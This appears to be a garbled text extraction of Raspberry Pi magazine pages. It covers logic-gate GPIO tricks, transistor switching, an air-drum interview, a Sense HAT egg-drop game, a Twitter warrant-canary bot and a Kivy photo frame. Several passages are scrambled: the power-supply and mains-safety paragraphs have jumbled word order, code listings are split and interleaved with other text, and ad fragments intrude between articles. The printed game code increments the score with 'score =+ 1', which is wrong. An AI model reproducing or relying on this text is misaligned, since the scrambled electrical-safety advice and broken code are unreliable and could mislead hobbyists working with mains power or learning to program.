Output Y3 Y2 1 1

Y1 1

Y0 1















0 0

1 1

0 1

1 0

0 1

1 1

1 0

First, the device has a so-called enable input, E. The device is only enabled if this input is at logic 0. If the device isn’t enabled, all its outputs will be high. Once enabled, one of the four outputs will go to logic 0 depending on the binary number on the inputs A0 and A1. So, for example, inputs of 1 and 0 (binary 10 = decimal 2) will result in a logic 0 on output Y2.



Secrets of Pi interfacing

WORK WITH LOGIC GATES TO USE FEWER GPIO PINS Logic circuitry can allow you to connect more devices to the Pi’s limited GPIO pins


Use a logic simulator

Before looking at some examples of logic circuitry, here’s a tip to help you check your ideas out without wiring anything up at all. If you’re not quite sure which logic devices you need, this will allow you to be sure before placing an order for components. The secret is to use a logic simulator and there are lots to choose from, some that run locally under various operating systems and some that run online. Here we’re testing the circuit from Step 6 at


Invert the outputs


Connect LEDs to 3.3V


Implement a bar display (1)

The previous diagram shows how a 2-to-4 decoder can be connected to two GPIO pins and provides four signals. However, the outputs are ‘active low’, so if LEDs were wired directly to the outputs, all would be lit except for the one represented by the binary input value. One way to have just the one LED lit at any one time is to use inverters, as shown in the diagram. A 74HC04 chip contains six inverters.

As a simpler alternative to inverting the outputs of logic devices with active low outputs, LEDs can be connected to 3.3V instead of 0V. We’ve already seen how driving a LED connected to 0V with a 3.3V signal will illuminate it and exactly the opposite is also true. The diagram shows an LED wired in this configuration and it will be lit if a logic 0 is applied to it, either directly from a GPIO pin or from an external logic device.


Use a 2-to-4 decoder

Driving four LEDs usually requires four GPIO pins. However, if we have an application where only one of them needs to be illuminated at any one time, as might be the case if the LEDs were indicating a status, we can make do with just two GPIO pins. This is achieved using a 2-to-4 decoder. As we’ve already seen, this outputs a logic 0 on one of its four outputs depending on the binary value on its inputs. A 74HC139 chip contains two 2-to-4 decoders and the diagram shows one driving four LEDs.


A bar display, like those sometimes seen on audio equipment, demonstrates the flexibility of external logic. We need to light no LEDs, one LED, two LEDs and so on up to four LEDs depending on a 2-bit binary value output on GPIO pins. This uses a 74HC139 again. The diagram is the first stage in providing this functionality and you’ll notice that, although similar to the circuit in Step 3,

a third GPIO pin is also used to drive the enable pin so that all the LEDs can be turned off.


Implement a bar display (2)

So far we have a circuit much like that in step 3, but with a means of turning off all the LEDs. The circuit in this step shows how adding three AND gates causes binary 00 to drive LED 1; binary 01 to drive LEDs 1 and 2; binary 10 to drive LEDs 1, 2 and 3; and binary 11 to drive LEDs 1, 2, 3 and 4. Looking back at the truth table for the AND gate, it should be fairly clear how this circuit achieves this.


Drive a seven-segment LED

Driving a seven-segment LED without external logic requires seven GPIO pins plus an eighth if you want to drive the decimal point. This can be reduced to four or five respectively by using a 74HC4511. This seven-segment encoder turns on the appropriate LEDs in the seven-segment display depending on the 4-bit binary value on its inputs. An interesting exercise is to work out how to drive a 4-digit seven-segment display – it doesn’t need four times as many GPIO pins if you multiplex them.


Very often when you use logic chips, only part of the chip will be used. For example, if you use a 74HC00 quad NAND gate and you use only two of the four gates, two of them will be left unused. This is not a problem, but you shouldn’t leave unused inputs unconnected as they can oscillate, causing the chip to draw an excessive current and overheat. The solution is to wire any unused inputs to either 3.3V or 0V. Unused output is OK and should be left unconnected.

10 08

Encode a switch

It’s not just outputs driving LEDs that can benefit from logic. By definition, a multi-way switch can only have one of its positions closed at once, so the output from a 4-way switch can be encoded as a 2-bit binary number. This is the opposite of decoding that we saw in Step 2. A chip that can do this is the 74HC148, which is actually an 8-to-3 line encoder, but we can use it as a 4-to-2 bit encoder by wiring its eight unused inputs to 3.3V.

Power supplies

ire a supply of and external devices requ If your interface circuitry header. Even so, if GPIO the on pins by ided 3.3V or 5V, it can be prov would be good unt of external circuitry, it you have a significant amo nd to avoid grou and ply sup the between practice to wire capacitors malfunction. to uit circ that could cause the fluctuations to the supply nF ceramic capacitors, 100 ral seve plus or acit Use a single 100µF cap

Connect unused inputs

Use 5V logic

Occasionally you’ll want to interface 5V logic circuitry, which you can’t connect directly to your Pi. There are several level converter chips, but most are unidirectional. However, Texas Instruments’ TXB0102, TXB0104 and TXB0108 chips (2, 4 and 8 channels, respectively) are bidirectional, which means that they’ll work if the GPIO pins are configured as input or outputs. The Texas devices are fiddly surface-mount chips, but several companies offer the TXB0104 and TXB0108 on breakout boards which are much easier to handle.

ICs. If you and wired close to those one per IC in your circuit, easiest solution is to the 5V, and 3.3V than r need a supply othe eries. If a pack of several 1.5V AA batt use a battery or, perhaps, eries, or batt with ined obta be ily ’t eas you need a voltage that can you ery, batt one from s supply voltage you want to create several lator. regu age volt a ed call ent can use a compon


Feature forrfac Pi Hackers ing rets of Pi inte ture SecElectronics Fea

EXCEED LIMITS SAFELY Interface devices that exceed the GPIO’s maximum voltage or current rating

Interfacing an output device such as an LED to a GPIO pin requires that the device doesn’t require more than 3.3V and it doesn’t draw more than a GPIO pin’s maximum 16mA current. Devices such as electric motors and blue or white LEDs, that require a higher voltage supply and/or draw a higher current, need special treatment. The solution is to use a transistor, which can be thought of as an electronic switch. A small current from a GPIO pin turns the transistor on or off, thereby turning on or off a separate circuit involving a higher voltage and often a higher current than a GPIO pin can supply. This secondary circuit might use the 5V on the GPIO header as its supply but, if a higher voltage is required or the current will be higher than the GPIO header can supply, an external power supply will be needed. The circuit diagram shows the general configuration. When 3.3V is applied to the transistor’s base via the resistor, it will turn on, a condition that you can think of as the transistor’s emitter being connected directly to its collector. This means that a current can flow from the high voltage supply, through the load (ie motor, blue LED etc) to 0V and so the motor will spin or the LED will illuminate. Choosing the type of transistor and the value of the resistor is quite an involved process, especially since there is such a staggering choice of different transistors. While we can’t fully cover this topic here, we can give some

pointers. First of all, in the circuit shown, the transistor must be of the type referred to as an NPN bipolar transistor. Transistors of this type will also be defined by their gain and the maximum current and voltage you can use on the emitter-collector circuit. Here is where it starts to get involved, but just let’s say that for voltages up to 24V and currents up to 250mA (conservative limits), a BC337 would be ideal. With this type of transistor and for this current, a 1k resistor would be suitable. Finally, if your load is a motor or a relay, it is important to wire a diode in parallel with the load (cathode to the supply) to suppress reverse currents which these components can generate and which could destroy the transistor. A 1N4148 would be suitable.

Interface to m ains equipm ent

ment isn’t difficult Designing circuitry to control mains equip destroy your Pi or but, if something goes wrong, you could that you can buy for this electrocute yourself. There are HATs either since the these mend recom don’t we purpose, but ge circuitry. If a -volta lower the to close mains terminals are set your Pi on fire, blow wire comes loose, therefore, you could your face, or leave high up a component, firing shrapnel into ngers. fi your to close y riousl voltages preca use off-the-shelf For this reason, we recommend that you to the mains-powered interfaces in which the only connection socket. Energenie devices is through a domestic-style 13A trolled sockets e-con remot 13A offers k) (energenie4 et rather like a hands olled contr radioa that can be used with can be used with a radio TV remote control. Alternatively, they Pi, which can also be transmitter module, designed for the comprising two sockets kit r starte A enie. Energ obtained from ing VAT and delivery. includ 9 £21.9 costs and one Pi interface


01202 586442

Pi Marketplace



M in

Love your Pi? Love Music?



ro Pi -D AC Ze

ro Ze

-D AC Pi

P+ M Pi -A

Pi -D ig





ig iA M -D Pi

Pi -D

AC +





10% Discount "Linux10"

Twitter: Email: Web:




IQaudio Limited, Cricklade Wiltshire. Company No.: 9461908

Motion tracking

To help get the controller tracking in place, David had to use TkInter. The app he made enabled David to factor in both the movement and speed of the controller, with different sounds achievable based on certain combinations of these factors

Trigger support

To get three sounds on each controller, David had to use the triggers as the primary component for the third sound. The pressing of the trigger, along with a specific motion of the controller, helps give off the sound of a cymbal or extra drum

Controller compatibility

Response time

One of the key factors about the project was to make sure that the sound response time was kept to a minimum. The Raspberry Pi 3 proved to be the perfect fit here, helping turn motion and triggers from the controllers into one of the implemented drum sounds

Right Both motion and speed are tracked directly by the Pi unit, which helps to then trigger the drum and cymbal sounds achieved by the controllers Below The project started from David’s purchase of a Silverlit Air Drum Kit, which was heavily modified for compatibility with the Raspberry Pi unit

Components list ■ Raspberry Pi 3 ■ Nintendo Wii controllers ■ Silverlit Air Drum Kit ■ Python cwiid library ■ TkInter ■ Open-source drum samples


David detailed that getting two controllers two work simultaneously was one of the biggest issues. He instead had to do some heavy tinkering with each controller’s MAC addresses to get them both working with the Pi, but also in tandem with one another

My Pi project

Raspberry Pi air drum kit

David Pride’s air drum kit turns the Raspberry Pi into a musical maestro Where did the original idea for the drum kit stem from? What’s always interesting to me is where we find our sources of inspiration. These can be a person, a book, a tweet, a website – anything at all. A lot of my project ideas start when I find something at the local car boot sale. This time what I found was an Air Play ‘Air Drum’ – being offered for the grand sum of £1! How could I possibly refuse? So I took it home and had a quick play and to be honest, while the concept is great, the actual functionality was a bit limited, the sound quality was rubbish and it was also a bit suspect as to what sound played with what movements. How was the build process? Did you encounter any issues? This got me to thinking whether I could make something more effective using a Raspberry Pi. We’ve been playing around with Wii controllers at both Cotswold Raspberry Jam and Cheltenham Hackspace recently. We’ve built several mini-bots for a bot-versus-bot challenge known as ‘Pi Noon’. Neil Caucutt from Cheltenham Hackspace has done an amazing job designing the chassis for these bots. They use the excellent Python cwiid library that lets you use Wii controllers with the Raspberry Pi. I’d only managed to ever get one controller working with a single Pi before so the first challenge was to get a pair of controllers working as the ‘sticks’. Once I’d identified that by using the MAC address of each controller, multiple controllers can be ‘read’ by a single Pi this gave me the ability to set up two controllers as a pair of drum sticks.

How are controller movements actually tracked? I found a bunch of open source drum samples that were available as .wav files – there are literally thousands of these out there to choose from. I then wrote a small TkInter app that displayed the position of the controller to give me an idea of the data that was being produced. Interestingly the position and accelerometer data from the Wii controller is all wrapped up in a single xyz Python tuple. This caused some confusion initially as if you move slowly from point A to point B this produces a very different reading than if the same movement is done rapidly. After playing around for a while (quite a long while!), I managed to map four distinct movements to four different drum sounds.

acceptable on a Pi 3, I posted the code to Github and others have also been having fun with it. I’ve seen one version that uses my controller code and PyGame to play the sound files; this seems to work better on older versions of the Pi. Is there any way you see this project being expanded on? Integrating more sounds perhaps? In regards to what else could be done, I am interested in seeing if the actual mechanics from the Wii controllers could be mounted in a pair of gloves; this could be a really interesting experiment. Additionally, I’d like to configure a more refined output that can generate MIDI signals rather than just playing stock sound files, this would really open up a whole range of different possibilities.

“What I found was an Air Play ‘Air Drum’ – being offered for the grand sum of £1! How could I refuse?” Were there any limits to the sounds you can implement? I initially wanted to get three sounds on each controller, but the movement scale was a bit too tight to do it successfully every time and two sounds often overlapped. So, I am using the trigger button combined with the movement for one of the sounds on each controller. This gives six different drum sounds, three per controller, that can be played easily without them overlapping. Did you find the Pi a good board? I found the response time to be very

Many of our readers will know about your Pi exploits. What’s next for you? Any big projects in the pipeline? In regards to what comes next, I am very fortunate in that I’ve just got my hands on a 3D printer so have been having a lot of fun experimenting with that. I’ve designed a LEGOcompatible case for the tiny Raspberry Pi Zero, which is proving extremely popular. I’ve been selected to take part in Pi Wars, the Raspberry Pi robotics competition that takes place in April 2017 so I’ll be doing a lot of preparation for that event too in the coming months.

David Pride

is a Raspberry Pi devotee who has played a major role in Pi-centric events throughout the UK.

Like it?

David has been massively involved with the Pi community for a number of years, and we’ve featured several of his projects previously. We highly recommend you check out his Connect 4 robot, which was another novel way into integrating the Raspberry Pi into a different type of project: http://bit. ly/2fbsSnW

Further reading

While the air drum kit may be a niche project to undertake, David does explain that this is very much a beginner-friendly project to get started with. A visual look at the project can be found over at: http://, while all the necessary code can be yours from his official GitHub listing: http://



Make an egg-drop game with the Sense HAT Use the same hardware that Major Tim Peake used on the ISS and code your own drop-and-catch game Dan Aldred

is a Raspberry Pi Certified Educator and a Lead School Teacher for CAS. He led the winning team of the Astro Pi Secondary School contest and appeared in the DfE’s ‘inspiring teacher’ TV advert. Recently he graduated from Skycademy, launching a Raspberry Pi attached to a high altitude balloon to over 31,000 metres into the stratosphere.

Some of the most basic and repetitive games are the most fun to play. Consider Flappy Bird, noughts and crosses or even catch. This tutorial shows you how to create a simple drop-andcatch game that makes excellent use of some of the Sense HAT’s features. Start off by coding an egg – a yellow LED – to drop each second, and a basket – a brown LED – on the bottom row of LEDs. Use the Sense HAT’s accelerometer to read and relay back when you tilt your Sense HAT left or right, enabling you move the basket toward the egg. Successfully catch the egg and you play again, with a new egg being dropped from a random position… But, if you miss one, then it breaks and it’s game over! Your program will keep you up to date with how you are progressing, and when the game ends, your final score is displayed. If you don’t own a Sense HAT, you can use the emulator that is available on the Raspbian with PIXEL operating system. You can also see the Egg Drop game in action here:


Import the modules

First, open your Python editor and import the SenseHAT module, line 1. Then import the time module, line 2, so you can add pauses to the program. The random module, line 3, is used to select a random location from the top of the LEDs, from which the egg will drop. To save time typing ‘SenseHAT’ repeatedly, add it to a variable, line 4. Finally, set all the LEDs to off to remove the previous score and game data, line 5.

from sense_hat import SenseHat import time import random sense = SenseHat() sense.clear()


■ Sense HAT ■ Raspbian with Pixel OS with Sense HAT emulator

game_over = False basket_x = 7 score = 0


Measure the basket movement: part 1

The basket is controlled by tilting your Sense HAT to the left or right, which alters the pitch. Create a function to hold the code, which will be used to respond to the movement and move the basket. On line 1, name the function; include the pitch reading and the position of the basket, basket_x. Use sense.set_pixel to turn on one LED at the bottom-right of the LEDs matrix, the co-ordinates (7,7), line 2. Then set the next position of the basket to the current position so that the function is updated when it runs again. This updates the variable with the new position of the basket and turns on the corresponding LED. This has the effect of looking like the basket has moved.

def basket_move(pitch, basket_x): sense.set_pixel(basket_x, 7, [0, 0, 0]) new_x = basket_x

Set the variables

Next, create the variables to hold the various game data. On line 1, create a global variable to hold the status of the game. This records whether the game is in play or has ended. The global enables the status to be used later on in the game with other parts of the program. On line 2, create another variable to hold your game score. Set the game_over variable on line 3 to False, this means the game is not over. The position of each LED on the matrix is referred to by the co-ordinates x and y, with the top line being number 0 down to number 7 at the bottom. Create a variable to hold the position of the basket, which is set on the bottom line of the LEDs, number 7. Finally, set the score to zero.

global game_over global score


What you’ll need


Measure the basket movement: part 2

The second part of the function consists of a conditional which checks the pitch and the basket’s current position. If the pitch is between a value of 1-179 and the basket is not at position zero, then the Sense HAT is tilted to the right and therefore the basket is moving to the right. The second condition checks that the value is between 359 and 179, which means that the tilt is to the


Johan Vinet has some excellent and inspirational examples of 8×8 pixel art, which include some famous characters and will show you what you can create with 64 pixels of colour. left, line 3. The last line of code returns the x position of the basket so it can be used later in the code – see Step 13.

if 1 < pitch < 179 and basket_x != 0: new_x -= 1 elif 359 > pitch > 179 and basket_x != 7: new_x += 1 return new_x,

Full code listing from sense_hat import SenseHat ###Egg Drop### ###Coded by dan_aldred### import time import random sense = SenseHat() sense.clear() global game_over global score game_over = False basket_x = 7 score = 0 '''main pitch measurement''' def basket_move(pitch, basket_x): sense.set_pixel(basket_x, 7, [0, 0, 0]) new_x = basket_x if 1 < pitch < 179 and basket_x != 0: new_x -= 1 elif 359 > pitch > 179 and basket_x != 7: new_x += 1 return new_x,


Create images for your game

Images are built up of pixels that combine to create an overall picture. Each LED on the matrix can be automatically set from an image file. For example, an image of a chicken can be loaded, the colours and positions calculated, and then the corresponding LEDs enabled. The image needs to be 8×8 pixels in size so that it fits the LED matrix. Download the test picture file, chicken.png, and save it into the same folder as your program. Use the code here in a new Python window to open and load the image of the chicken (line 3). The Sense HAT will do the rest of the hard work for you.

from sense_hat import SenseHat sense = SenseHat() sense.load_image("chicken.png")


'''Main game setup''' def main(): global game_over '''Introduction''' sense.show_message("Egg Drop", text_ colour = [255, 255, 0]) sense.set_rotation(90) sense.load_image("chick.png") time.sleep(2) sense.set_rotation() '''countdown''' countdown = [3, 2, 1] for i in countdown: sense.show_message(str(i), text_ colour = [255, 255, 255]) basket_x = 7 egg_x = random.randrange(0,7) egg_y = 0 sense.set_pixel(egg_x, egg_y, [255, 255,

Create your own 8×8 image

The simplest method to create your own image with the LEDs is a superb on-screen program that enables you to manipulate the LEDs in real-time. You can change the colours, rotate them and then export the image as code or as an 8×8 PNG file. First, you need to install Python PNG library; open the Terminal window and type:

sudo pip3 install pypng After this has finished, type:

git clone RPi_8x8GridDraw Once the installation has completed, move to the RPi folder:

0]) sense.set_pixel(basket_x, 7, [139, 69, 19]) time.sleep(1) while game_over == False: global score '''move basket first''' '''Get basket position''' pitch = sense.get_orientation() ['pitch'] basket_x, = basket_move(pitch, basket_x) '''Set Basket Positon''' sense.set_pixel(basket_x, 7, [139, 69, 19]) time.sleep(0.2)

cd RPi_8x8GridDraw


Tutorial Now enter the command:

python3 …to run the application.

sense.show_message("Egg Drop", text_colour = [255, 255, 0])


Display your start image

Once the start message has scrolled across the Sense HAT LED matrix, you can display your game image, in this example a chicken. Due to the orientation of the Sense HAT and the location of the wires, you’ll need to rotate it through 90 degrees so it faces the player, line 1. Load the image with the code sense.load.image, line 2. Display the image for a few seconds using time.sleep(), line 3. Note that the lines from now on are indented in line with the previous line.

sense.set_rotation(90) sense.load_image("chick.png") time.sleep(2) sense.set_rotation()


Create and export your image

The Grid Editor enables you to select from a range of colours displayed down the right-hand side of the window. Simply choose the colour and then click the location of the LED on the grid; select ‘Play on LEDs’ to display the colour on the Sense HAT LED. Clear the LEDs using the Clear Grid button and then start over. Finally, when exporting the image, you can either save as a PNG file and then apply the code in the previous step to display the picture, or you can export the layout as code and import that into your program.


Count down to the game starting

Once the start image has been displayed, prepare the player to get ready for the game with a simple countdown from three to one. First create a list called countdown, which stores the values 3, 2, and 1, line 1. Use a for loop, line 2, to iterate through each of the numbers and display them. This uses the code sense.show_message(str(i) to display each number on the LEDs. You can adjust the colour of the number using the three-part RGB values, text_colour = [255, 255, 255]), line 3.

countdown = [3, 2, 1] for i in countdown: sense.show_message(str(i), text_colour = [255, 255, 255])

11 08

Display a message: the game begins

Now you have an image, you are ready to create the function that controls the whole game. Create a new function, line 1, called main, and add the code:

sense.show_message …to display a welcome message to the game, line 3. The values 255, 255 and 0 refer to the colour of the message (in this example, yellow). Edit these to choose your own preferred colour.

def main(): global game_over


Set the egg and basket

As the game starts, set the horizontal position, the ‘x’ position, of the basket to 7; this places the basket in the bottom right-hand corner of the LED matrix. Now set the x position of the egg at a random positon between 0 and 7, line 2. This is at the top of the LED matrix and ensures that the egg does not always fall from the same starting point. Last, set the egg’s y value to 0 to ensure that the egg falls from the very top of the LED matrix, line 3.

basket_x = 7 egg_x = random.randrange(0,7) egg_y = 0


Display the egg and basket

In the previous step, you set the positions for the egg and the basket. Now use these variables to display them. On line 1, set the egg using the code sense.set.pixel followed by its x and y co-ordinates. The x position is a random position between 0 and 7, and the y is set to 0 to ensure that the egg starts from the top. Next, set the colour to yellow. (Unless your egg is rotten, in which case

Make a fun game set it to green (0,255, 0). Next, set the basket position using the same code, line 2, where the x position is set to 7 to ensure that the basket is displayed in the bottom right-hand LED. Set the colour to brown using the values 139, 69, 19.

sense.set_pixel(egg_x, egg_y, [255, 255, 0]) sense.set_pixel(basket_x, 7, [139, 69, 19]) time.sleep(1)


Move the basket: part 1

Begin by checking that the game is still in play (the egg is still dropping), checking that the game_over variable is False, line 1. On line 2, import the score. Next, take a reading of the ‘pitch’ of the Sense HAT, using the code sense.get_orientation()['pitch'], line 3. Note that this is the value derived from the function you created in steps 4 and 5. The final line of code uses the function to turn off the LED that represents the basket and then looks at the value of the pitch, determining if the Sense HAT is tilted to the left or right, and then either adds or subtracts one from the x position of the current LED. This has the effect of selecting either the adjacent left or right LED to the current LED. Finally, update the basket_x value with the new position value.

while game_over == False: global score pitch = sense.get_orientation()['pitch'] basket_x, = basket_move(pitch, basket_x)


Move the basket: part 2

Your program has now calculated the new position of the basket. Next, turn on the relevant LED and display the basket in its new position. On line 1, use the code sense.set_pixel(basket_x, 7, [139, 69, 19]) to set and turn on the LED; basket_x is the value calculated in the previous step using the function in steps 4 and 5. Add a short time delay to avoid over-reading the pitch, line 2. You now have a basket that you can move left and right.

Full code listing (cont.) '''Egg drop''' sense.set_pixel(basket_x, 7, [0, 0, 0]) sense.set_pixel(egg_x, egg_y, [0, 0, 0]) egg_y = egg_y + 1 #print (egg_y) sense.set_pixel(egg_x, egg_y, [255,

sense.set_pixel(basket_x, 7, [139, 69, 19]) time.sleep(0.2)


Drop the egg: part 1

The egg is dropped from a random position from one of the LEDs across the top line. To make it appear to be dropping, first turn off the LED that represents the egg using the code sense.set_pixel(egg_x, egg_y, [0, 0, 0]). The values 0, 0, 0, refer to black and therefore no colour will be displayed; it will appear that the egg is no longer on the top line.

sense.set_pixel(egg_x, egg_y, [0, 0, 0])


Drop the egg: part 2

Since the egg drops downwards, you only need to update the y axis position. Do this on line 1 by updating the egg_y variable using the code egg_y = egg_y + 1, which means it will change from an initial value of zero to a new value of one. (The next time the ‘game loop’ runs, it will update to two and so on until the egg reaches the bottom of the matrix, a value of seven). Once the y position is updated, display the egg in its new position, using sense.set_pixel, line 2. The egg will appear to have dropped down one LED toward the bottom.

egg_y = egg_y + 1 sense.set_pixel(egg_x, egg_y, [255, 255, 0])

255, 0]) '''Check posiion of the egg and basket x , y''' if (egg_y == 7) and (basket_x == egg_x or basket_x-1 == egg_x ): sense.show_message("1up", text_ colour = [0, 255, 0]) sense.set_pixel(egg_x, egg_y, [0, 0, 0])#hides old egg egg_x = random.randrange(0,7) score = score =+ 1 egg_y = 0 elif egg_y == 7: sense.show_message("Game Over", text_colour = [255, 38, 0]) return score game_over = True break main() time.sleep(1) sense.clear() sense.show_message("You Scored " + str(score), text_colour = [128, 45, 255], scroll_speed = 0.08)


Tutorial egg_x = random.randrange(0,7) score = score =+ 1 egg_y = 0


What happens if you miss the egg?

If you miss the egg or drop it, then the game ends. Create a conditional to check that the egg’s y position is equal to or greater than 7, line 1. Display a message that states that the game is over, line 2, and then return the value of the score that is displayed across the LED matrix in step 23.


elif egg_y == 7: sense.show_message("Game Over", text_colour = [255, 38, 0]) return score Did you catch the egg?

At this stage in the tutorial, you have a falling egg and a basket that you can move left and right as you tilt the Sense HAT. The purpose of the game is to catch the egg in the basket, so create a line of code to check that this has happened, line 1. This checks that the egg is at the bottom of the LED matrix, ie in position 7, and that the basket’s x position is the same value as the egg’s x position. This means that the egg and the basket are both located in the same place and therefore you have caught the egg.

if (egg_y == 7) and (basket_x == egg_x or basket_x-1 == egg_x ):



If you catch the egg in the basket, then you gain one point. Notify the player by scrolling a message across the LEDs using the, line 1. Write your own message and select a colour. Since you have caught the egg, it should disappear as it is in the basket; to do this set the ‘egg’ pixel to a colour value of 0, 0, 0. This basically turns off the egg LED, making the egg disappear. Note that these lines are both indented.

sense.show_message("1up", text_colour = [0, 255, 0]) sense.set_pixel(egg_x, egg_y, [0, 0, 0])


Set up for the next round

Since you caught the egg, you get to play the game again. Set a new egg to drop from a random x position on the LED matrix, line 1. Update your score by one point and then set the egg’s y position to 0, line 3. This ensures that the egg is back at the very top of the LED matrix before it starts dropping.



Stop the game

Since the game is over, change the game_over variable to True, which stops the game loop from running again and then runs the last line of the program.

game_over = True break


Start the game

The main instructions and game mechanics are stored in one function called main(), which holds most of the game structure and processes. Functions are located at the start of a program to ensure that they are loaded first, ready for the program to use. To start the game, simply call the function (line 1), add a small delay (line 2), and ensure all the LEDs are set to off before the game starts (line 3).

main() time.sleep(1) sense.clear()


Display your final score

If you did not catch the egg, then the game is over and your score is scrolled across the LEDs. This uses the line sense.show_message and then pulls the value from the global_score variable; convert this value into a string using str, line 1. Your program is now completed; save the file and then run it. Press F5 on the keyboard to do this. After the opening image and message are displayed, the countdown will begin and the game will start. Can you catch the egg?

sense.show_message("You Scored " + str(score), text_colour = [128, 45, 255], scroll_speed = 0.08)

EXPLORE THE TECH INSIDE w w w.gad getdaily.x y z

Available from all good newsagents and supermarkets








Nonpolar end

AIR Polar end




Without an emulsifier added to the mixture, air and water just won’t mix – there is nothing between the particles that will enable them to bind

Emulsifiers create polar and non-polar ends that attach to water and air respectively. These enable the particles to bind, which is why foams retain their shape and integrity for longer

The casing A series of valves and springs ensures the foam is released with enough force in order to keep the consistency intact

The canister Nitrous oxide is used to force air into whatever’s in the siphon – handy for creating foams of any density

£70 | $65

Siphon R-Evolution A full do-it-yourself kit aimed at any would-be culinary whipper. It comes with various whipping agents, so you can start experimenting with airs and foams of your own the second it arrives.


Print edition available at Digital edition available at 032-045 GDT004 Kitchen Tech.indd 43

22/12/2015 22:04

Available on the following platforms


Make Raspberry Pi-based warrant canary Protect yourself from Orwellian gagging orders and secret warrants with your own warrant canary

‘personal website’, enter the URL of your Twitter channel. Tick to say you’ve read and agreed to the developer agreement then click Create your Twitter Application.

Nate Drake

(@natewriter) is a freelance tech journalist specialising in cyber security. He decided to use Twitter for his own warrant canary after watching hours of cartoons.

What you’ll need ■ Suitable for all models of Raspberry Pi

The warrant canary borrows its name from the unfortunate bird that was taken down mine shafts. It’s a reaction against secret requests to obtain customer’s personal data. For example, when a court order is served on a business, its owners are forbidden from alerting users that their data has been compromised. Warrant canaries cleverly slalom around this legal hurdle through regularly making a statement that they have not been subject to such a request. If they switch off their warrant canary, as Reddit did in March 2016, users will know that an external agency also has access to the data a company stores about them. The legal ramifications of this are complex and depend on where you are in the world; this tutorial is an exercise in proof-of-concept only. For this tutorial we will use the Raspberry Pi along with a dedicated Twitter bot to build your own warrant canary.

Left Use a valid e-mail address and phone number to create a new account


Create a Twitter account

Head to and create a new Twitter account. You will need a valid e-mail address and mobile phone number. If you already have a Twitter account, make sure to add a phone number, as this is required in order to use a Twitter Bot. See https:// for help with this.

Left If possible leave this page open, as you’ll need the API Keys and Access Tokens shortly


Create your Access Token

Click on Keys and Access Tokens. Make a note of your API keys. Next, scroll to Token Actions and click Create My Access Token. Write down the Access Token and the Access Token secret. Your Raspberry Pi will need this information in order to be able to connect securely to Twitter later.

Left Click Edit Profile to amend your details. Confirm your e-mail address before proceeding


Tweak profile

Optionally at this stage you can choose to delete your mobile phone number from Twitter. It is only required once in order to deter spammers. Feel free at this stage to add a profile picture to your account and update the bio to explain what your warrant canary is for.


Left Fill in Name, Description and Website. The other fields can be left blank


Create the application

Once your account is set up, go to http://apps.twitter. com on any advice and click Create New Application to begin setting up a dedicated bot for your warrant canary. Under


Twitter has strict safeguards against spam bots. This is why it requires accounts using Applications to be verified by SMS. You may notice when testing your script that Twitter will also not allow duplicate statuses. Make sure that your tweets are well spaced apart. The above tutorial will have your Pi’s canary tweet every day at midnight. If you need them to be closer together the raspberrypi. org website has some tips on using Twython to post messages at random from a list.

Warrant canary ARE WARRANT CANARIES LEGAL? Left Twython is a Python wrapper for Twitter’s API


Install Software on the Pi Open Terminal on your Pi or connect via SSH. Run…

sudo apt-get update and sudo apt-get upgrade to update Raspbian. Next run sudo pip install twython requests requests_oauthlib

The legal loophole that warrant canaries supposedly exploit has yet to be tested. In 2015 Australia outlawed them altogether and other countries may follow suit, threatening punishment if the canary isn’t maintained. Prosecution would be difficult however without revealing the existence of the very information the original warrant was designed to suppress in open court. It’s fine to make one as a proof of concept, but you’ll need to research to find out if actually using one as an injunction warning system is legal where you are.

…to install all necessary software.


Create the Python script

In the Pi Terminal, run the command… Left When entering the keys, make sure there are no spaces inside the quote marks


…to create your script. Next paste in the following:

#!/usr/bin/env python import sys from twython import Twython

Left This command sets the canary to tweet every day at midnight. See for more options

If this is the first time you’ve run crontab, choose option 2 to select an editor. Scroll to the bottom and paste the following:

0 0 * * * /usr/bin/python /home/pi/ tweetStr = “I have not been subject to any government gagging orders and/or subpoenas at the time of this Tweet.” # Insert your API keys and access tokens here apiKey = ‘yourapikey’ apiSecret = ‘yourapisecret’ accessToken = ‘youraccesstoken’ accessTokenSecret = ‘youraccesstokensecret’ api = Twython(apiKey,apiSecret,accessToken,accessToke nSecret) api.update_status(status=tweetStr) print “Tweeted: “ + tweetStr

Left Use the hash (#) symbol to comment out the line starting “tweetStr”


Add a photo to your Tweets (Optional) Run

sudo nano Replace “yourapikey” and so on with the actual values from the page Press Ctrl+X, then Y, then Return to save and exit.


Test the script


Run this command…


Left Double-check that the tweet has been sent by visiting your Twitter channel

…to test the script. If successful it will display a message saying that the Tweet has been sent.


…to edit your Python script. Comment out the line beginning “tweetStr”, then replace the lines…

Schedule your canary

The warrant canary should be set to tweet daily unless you intervene. In the Pi terminal run the following…

sudo crontab -e

print “Tweeted: “ + tweetStr@ …with:

message = “No FBI here!” with open(‘/home/pi/Downloads/image.jpg’, ‘rb’) as photo: api.update_status_with_media(status=message, media=photo) print “Tweeted: “ + message


Python column

A Raspberry Pi photo frame With some Python code and a nice display screen, you can turn your Raspberry Pi into a very nice photo frame

Joey Bernard

Joey Bernard is a true Renaissance man, splitting his time between building furniture, helping researchers with scientific computing problems and writing Android apps

In a previous article, we looked at using Kivy as a cross-platform graphical interface framework that you can use with your Raspberry Pi. Unfortunately, we did not have the room to really look at any possible uses. This issue, we will look at one possible use, that of displaying photos on some kind of display. This might be something you do at home, with family pictures, or it could be a slideshow for a business or event. If you didn't get a chance to read the previous article, that is okay. We will review enough of the basics that you should be able to get off to a running start now. You will obviously need a physical display attached to your Raspberry Pi to show the images on. There are several options available, such as the official

Python code that does the work of loading images and displaying them. The first step is to get the list of image files to use as part of the photo frame. There are several different ways you could do this. If you wanted to simply use all of the images within a subdirectory, you could create the list with the code here:

# get all images in a subdirectory current_dir = dirname(__file__) filelist = glob(join(current_dir, 'images', '*')) This pulls all of the files in the subdirectory named 'images'. If your images are scattered around your filesystem, it might be better to use a text file containing the locations for each of the files you want to

"You subclass the App class to Why create the graphical interface" Python? Itâ&#x20AC;&#x2122;s the official language of the Raspberry Pi. Read the docs at

7-inch touch screen. You can also use anything that accepts HDMI as input. You will also need your Raspberry Pi to start up the X11 server when it boots up. By default, Raspbian should do this. But, if you have disabled the X11 server and only use the console, you will need to either re-enable the desktop or just reinstall the OS to have a clean start. The first step is to be sure that the Kivy packages are installed on your Raspberry Pi. If you are running Raspbian, you can do this with the command

sudo apt-get install python-kivy python-kivy-examples This also installs a collection of good examples that you can use as jumpingoff points for further projects. With Kivy, you subclass the App class to create the graphical interface. The core of the Python script would contain the following code

